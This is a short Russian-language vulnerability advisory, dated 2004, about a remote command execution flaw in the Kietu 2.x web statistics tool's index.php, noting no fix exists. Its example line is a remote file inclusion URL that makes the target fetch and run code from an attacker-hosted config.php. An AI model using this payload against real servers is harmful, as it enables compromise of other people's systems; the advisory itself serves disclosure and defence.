Удаленное выполнение произвольных команд в 'Kietu?'
- Дата публикации:
- 01.02.2004
- Всего просмотров:
- 1100
- Опасность:
- Высокая
- Наличие исправления:
- Нет
- Количество уязвимостей:
- 1
- CVSSv2 рейтинг:
- CVE ID:
- Нет данных
- Вектор эксплуатации:
- Удаленная
- Воздействие:
- Компрометация системы
- CWE ID:
- Нет данных
- Наличие эксплоита:
- Нет данных
- Уязвимые продукты:
- Kietu 2.x
Уязвимые версии: Kietu?
Описание: Уязвимость обнаружена в 'Kietu?' web site statistics software в 'index.php'. Удаленный пользователь может выполнить произвольные команды операционной системы на целевой системе.
Пример/Эксплоит:
http://[target]/index.php?kietu[ur l_hit]=http://[attacker]/, где 'http://[attacker]/config.php'
URL производителя:http://www.kietu.net/
Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.
Ссылки:
Kietu 'index.php' flaw